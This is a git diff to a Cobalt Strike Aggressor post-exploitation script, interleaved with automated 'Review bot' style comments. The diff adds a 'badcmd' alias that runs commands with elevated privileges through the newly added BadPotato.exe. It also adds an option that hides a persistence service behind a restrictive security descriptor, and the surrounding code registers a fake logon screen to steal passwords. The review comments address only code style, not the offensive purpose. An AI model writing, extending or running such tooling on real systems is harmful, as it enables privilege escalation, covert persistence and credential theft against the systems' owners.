diff --git a/modules/commands.cna b/modules/commands.cna
index a554341..957231e 100644
--- a/modules/commands.cna
+++ b/modules/commands.cna
@@ -57,4 +57,23 @@ alias logonscreen{
 beacon_command_register(
 "logonscreen",
 "pop a fake logonscreen to steal password",
- "");
\ No newline at end of file
+ "");
+
+alias badcmd{
+ if($2 eq ""){
+ btask($1,"Usage: badcmd [command]");
+ return;
+ }
+ $args = "";
+ @args_list = sublist(@_, 1);
+ foreach $arg (@args_list){
+ $args .= $arg . " ";
+ }
+ $cmd = "\"".replace($args, "\"", "\\\"")."\"";
+ bexecute_assembly($1, script_resource("post/BadPotato.exe"), $cmd);
+}
+
+beacon_command_register(
+ "badcmd",
+ "execute command use badpotato",
+ "Usage: badcmd [command]");
\ No newline at end of file
diff --git a/modules/gather.cna b/modules/gather.cna
index e3e12ae..90d8ad2 100644
--- a/modules/gather.cna
+++ b/modules/gather.cna
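Review bot: `$args`, `@args_list`, `$arg` and `$cmd` in the new `badcmd` alias are assigned without a `local(...)` declaration, so they become script-level globals that persist between invocations and can collide with any other alias in the script that reuses those names. The same commit's `InstallService` in persistence.cna declares its working variables with `local('$Name $Path $Hide_cmd')`, so for consistency the alias should open with `local('$args @args_list $arg $cmd');`. The usage text is also written twice, once in the `btask` call and once in `beacon_command_register`; a single constant would keep the two from drifting apart.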
@@ -101,37 +101,37 @@ sub main{
 }
 }
-sub audit{
- $bid = $1['@'];
- $fname = beacon_info($bid,"computer")."-info.txt";
- $lpath = script_resource("temp\\ $+ $fname");
- $suggester = script_resource("local\\windows-exploit-suggester.py");
- $db = script_resource("local\\2020-04-10-mssb.xls");
- $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt");
- bshell($bid,"systeminfo > $+ $fname");
- bdownload($bid, $fname);
- #sleep(3 * 1000);
- foreach %item (downloads()){
- if (%item['name'] eq $fname){
- $rpath = %item['lpath'];
- sync_download($rpath, $lpath);
- }
- }
- #sleep(3 * 1000);
- if (-exists $lpath){
- $cmd = $suggester." -i $+ $lpath -d $+ $db";
- $process = exec("cmd.exe /c ".$cmd);
- @data = readAll($process);
- $out = openf(">" . $audit_fname);
- foreach $line (@data){
- writeb($out, $line."\r\n");
- }
- closef($out);
- closef($process);
- deleteFile(replace($fname, "\\\\", "/"));
- exec("cmd.exe /c start ".script_resource("logs\\"));
- }
- }
+# sub audit{
+# $bid = $1['@'];
+# $fname = beacon_info($bid,"computer")."-info.txt";
+# $lpath = script_resource("temp\\ $+ $fname");
+# $suggester = script_resource("local\\windows-exploit-suggester.py");
+# $db = script_resource("local\\2020-04-10-mssb.xls");
+# $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt");
+# bshell($bid,"systeminfo > $+ $fname");
+# bdownload($bid, $fname);
+# #sleep(3 * 1000);
+# foreach %item (downloads()){
+# if (%item['name'] eq $fname){
+# $rpath = %item['lpath'];
+# sync_download($rpath, $lpath);
+# }
+# }
+# #sleep(3 * 1000);
+# if (-exists $lpath){
+# $cmd = $suggester." -i $+ $lpath -d $+ $db";
+# $process = exec("cmd.exe /c ".$cmd);
+# @data = readAll($process);
+# $out = openf(">" . $audit_fname);
+# foreach $line (@data){
+# writeb($out, $line."\r\n");
+# }
+# closef($out);
+# closef($process);
+# deleteFile(replace($fname, "\\\\", "/"));
+# exec("cmd.exe /c start ".script_resource("logs\\"));
+# }
+# }
 #append menus
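Review bot: The removed `audit` sub is carried forward as a 31-line commented-out block (`+# sub audit{` … `+# }`) instead of being deleted, and the same is done for its menu entry in the `@@ -163,7 +163,7 @@` hunk. Version control already preserves the old implementation, so the commented copy only adds noise and will silently drift from the helpers it calls. Drop the `+#` lines, or if the feature is expected to return, leave a one-line pointer such as `# audit() removed in this commit; see git history` in its place.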
@@ -144,7 +144,7 @@ sub audit{
 dialog_description($dialog, "Collect information about the target host");
 drow_checkbox($dialog, "sysinfo", "System informations", "");
 drow_checkbox($dialog, "ipconfig", "Network card configuration information", "");
- drow_checkbox($dialog, "netstat", "Listening port list", "");
+ drow_checkbox($dialog, "netstat", "Listening TCP port list", "");
 drow_checkbox($dialog, "software", "Installed software list", "");
 drow_checkbox($dialog, "ps_soft", "Installed software list(use powershell)", "");
 drow_checkbox($dialog, "runprocs", "Startup processes list", "");
@@ -163,7 +163,7 @@ sub audit{
 dialog_show($dialog);
 }
- item "Audit available lpe vulnerability"{
- audit($1);
- }
+ # item "Audit available lpe vulnerability"{
+ # audit($1);
+ # }
 }
\ No newline at end of file
diff --git a/modules/persistence.cna b/modules/persistence.cna
index e9fde24..cfb1520 100644
--- a/modules/persistence.cna
+++ b/modules/persistence.cna
@@ -46,10 +46,16 @@ sub InstallSchedule{
 }
 sub InstallService{
- local('$Name $Path');
+ local('$Name $Path $Hide_cmd');
 $Name = $3['SerName'];
 $Path = replace($3['Path'], "\"", "");
- bshell($bid, "sc create \" $+ $Name\" binpath= \"cmd /c start \" $+ $Path\"\"&&sc config \" $+ $Name\" start= auto&&net start $+ $Name");
+ $Hide_cmd = "sc sdset $+ $Name \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"";
+ if ($3['Hide'] eq "true"){
+ bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto && $+ $Hide_cmd");
+ }
+ else{
+ bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto");
+ }
 }
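Review bot: In the `@@ -46,10 +46,16 @@` hunk `InstallService` reads `$bid` in both `bshell!` calls, but `$bid` is neither a parameter (`$1`–`$3` are the dialog callback arguments) nor named in the new `local('$Name $Path $Hide_cmd')` line, so the sub depends on a script global that must be set by whoever opened the dialog; the whole sub body is inside the hunk and no assignment to it is visible. Either pass the beacon id explicitly or add a comment at the top of the sub stating where `$bid` comes from, e.g. `# $bid: beacon id, set as a script global by the menu handler that opens this dialog`. The 200-character `$Hide_cmd` SDDL literal is also undocumented; a short comment naming what the descriptor restricts and why the `Hide` checkbox maps to it would spare the next reader from decoding the ACE strings.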
@@ -100,6 +106,7 @@ sub InstallService{
 dialog_description($Dialog, "Register an executable file as a service");
 drow_text($Dialog, "SerName", "Service Name: ");
 drow_text($Dialog, "Path", "Bin Path: ");
+ drow_checkbox($Dialog, "Hide", "Hide service: ", "");
 dbutton_action($Dialog, "Install");
 dialog_show($Dialog);
 }
diff --git a/post/BadPotato.exe b/post/BadPotato.exe
new file mode 100644
index 0000000..75c55aa
Binary files /dev/null and b/post/BadPotato.exe differ